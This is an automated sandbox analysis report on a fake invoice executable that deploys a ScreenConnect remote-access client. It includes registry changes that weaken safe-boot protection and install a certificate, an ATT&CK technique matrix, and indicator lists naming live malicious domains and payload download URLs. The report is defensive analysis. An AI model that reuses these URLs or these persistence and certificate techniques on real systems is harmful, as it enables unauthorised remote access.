                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeCode function: 0_2_009B1806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_009B1806
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (b044e727-8609-4a6c-b885-92d6249fd38a)Jump to behavior
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: Yara matchFile source: 6.0.ScreenConnect.WindowsClient.exe.1e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000000.2369506289.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4002929791.0000023CE6080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3991111838.0000023CCC49A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 6456, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 6552, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 1340, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, type: DROPPED
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure1
                  Valid Accounts
                  11
                  Native API
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  121
                  Disable or Modify Tools
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  Inhibit System Recovery
                  CredentialsDomainsDefault Accounts12
                  Command and Scripting Interpreter
                  1
                  DLL Search Order Hijacking
                  1
                  DLL Search Order Hijacking
                  1
                  Obfuscated Files or Information
                  LSASS Memory2
                  File and Directory Discovery
                  Remote Desktop ProtocolData from Removable Media21
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job
                  1
                  Valid Accounts
                  1
                  Valid Accounts
                  1
                  Install Root Certificate
                  Security Account Manager34
                  System Information Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron2
                  Windows Service
                  1
                  Access Token Manipulation
                  1
                  Software Packing
                  NTDS31
                  Security Software Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Scheduled Task/Job
                  2
                  Windows Service
                  1
                  Timestomp
                  LSA Secrets2
                  Process Discovery
                  SSHKeylogging13
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                  Bootkit
                  12
                  Process Injection
                  1
                  DLL Side-Loading
                  Cached Domain Credentials41
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                  Scheduled Task/Job
                  1
                  DLL Search Order Hijacking
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                  Masquerading
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Valid Accounts
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Modify Registry
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Access Token Manipulation
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task41
                  Virtualization/Sandbox Evasion
                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers12
                  Process Injection
                  GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                  Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                  Hidden Users
                  Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                  Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                  Bootkit
                  Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523876 Sample: E_BILL0041272508.exe Startdate: 02/10/2024 Architecture: WINDOWS Score: 72 40 mmf351.ddns.net 2->40 42 otohelp.top 2->42 44 2 other IPs or domains 2->44 48 Suricata IDS alerts for network traffic 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 .NET source code references suspicious native API functions 2->52 56 2 other signatures 2->56 9 E_BILL0041272508.exe 2 2->9         started        11 ScreenConnect.ClientService.exe 2 5 2->11         started        14 svchost.exe 1 1 2->14         started        signatures3 54 Uses dynamic DNS services 40->54 process4 dnsIp5 17 dfsvc.exe 130 107 9->17         started        62 Reads the Security eventlog 11->62 64 Reads the System eventlog 11->64 66 Deletes keys which are related to windows safe boot (disables safe mode boot) 11->66 21 ScreenConnect.WindowsClient.exe 11->21         started        46 127.0.0.1 unknown unknown 14->46 signatures6 process7 dnsIp8 38 otohelp.top 79.110.49.16, 443, 49714, 49716 OTAVANET-ASCZ Germany 17->38 30 C:\...\ScreenConnect.WindowsFileManager.exe, PE32 17->30 dropped 32 C:\Users\...\ScreenConnect.WindowsClient.exe, PE32 17->32 dropped 34 ScreenConnect.WindowsBackstageShell.exe, PE32 17->34 dropped 36 13 other files (none is malicious) 17->36 dropped 24 ScreenConnect.WindowsClient.exe 19 10 17->24         started        58 Contains functionality to hide user accounts 21->58 file9 signatures10 process11 signatures12 60 Contains functionality to hide user accounts 24->60 27 ScreenConnect.ClientService.exe 1 3 24->27         started        process13 signatures14 68 Detected unpacking (creates a PE file in dynamic memory) 27->68 70 Contains functionality to hide user accounts 27->70 72 Enables network access during safeboot for specific services 27->72

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  E_BILL0041272508.exe18%ReversingLabs
                  E_BILL0041272508.exe14%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  otohelp.top3%VirustotalBrowse
                  fp2e7a.wpc.phicdn.net0%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://otohelp.top/Bin/ScreenConnect.Windows.dll1%VirustotalBrowse
                  https://otohelp.top/Bin/ScreenConnect.ClientService.dll1%VirustotalBrowse
                  https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config1%VirustotalBrowse
                  https://otohelp.top/Bin/ScreenConnect.Client.dll1%VirustotalBrowse
                  https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe1%VirustotalBrowse
                  https://otohelp.top0%VirustotalBrowse
                  http://www.xrml.org/schema/2001/11/xrml2coreS0%VirustotalBrowse
                  https://otohelp.top/Bin/ScreenConnect.Client.manifest1%VirustotalBrowse
                  http://www.w3.o0%VirustotalBrowse
                  https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe1%VirustotalBrowse
                  http://www.xrml.org/schema/2001/11/xrml2core0%VirustotalBrowse
                  https://otohelp.top/Bin/ScreenConnect.Client.applicationX1%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  mmf351.ddns.net
                  79.110.49.16
                  truetrue
                    unknown
                    otohelp.top
                    79.110.49.16
                    truetrueunknown
                    fp2e7a.wpc.phicdn.net
                    192.229.221.95
                    truefalseunknown
                    NameMaliciousAntivirus DetectionReputation
                    https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe.configtrueunknown
                    https://otohelp.top/Bin/ScreenConnect.Windows.dlltrueunknown
                    https://otohelp.top/Bin/ScreenConnect.Client.dlltrueunknown
                    https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exetrueunknown
                    https://otohelp.top/Bin/ScreenConnect.ClientService.dlltrueunknown
                    https://otohelp.top/Bin/ScreenConnect.Client.manifesttrueunknown
                    https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exetrueunknown
                    https://otohelp.top/Bin/ScreenConnect.WindowsClient.exetrue
                      unknown
                      https://otohelp.top/Bin/ScreenConnect.WindowsClient.exe.configtrue
                        unknown
                        https://otohelp.top/Bin/ScreenConnect.Core.dlltrue
                          unknown
                          https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.configtrue
                            unknown
                            https://otohelp.top/Bin/ScreenConnect.ClientService.exetrue
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://otohelp.top/Bin/ScreenConnect.Client.application0dfsvc.exe, 00000002.00000002.4002687215.0000023CE6050000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://otohelp.top/Bin/ScreenConnect.WindowsClient.exedldfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://otohelp.top/Bin/ScreenConnect.WindowsClient.exdfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://otohelp.top/Bin/ScreenConnect.Cliedfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://otohelp.top/Bin/ScreenConnect.WindowsBackstagedfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exeUdfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000002.00000002.3991111838.0000023CCC1C0000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                          https://otohelp.top/Bin/ScreenConnect.Windows.dllRdfsvc.exe, 00000002.00000002.4004252606.0000023CE620F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://otohelp.top/Bin/ScreenConnect.Winddfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              http://www.w3.odfsvc.exe, 00000002.00000002.3991111838.0000023CCC554000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                              https://otohelp.topdfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC893000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC14A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedfsvc.exe, 00000002.00000002.3991111838.0000023CCC14A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.2443372592.00000000020BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://otohelp.top/Bin/ScreenConnect.xdfsvc.exe, 00000002.00000002.3991111838.0000023CCC893000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe9dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://otohelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicationScreenConnect.WindowsClient.exe, 00000006.00000002.2385257906.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2386097468.000000001AE66000.00000004.00000020.00020000.00000000.sdmp, AYPVIQNL.log.2.drfalse
                                                    unknown
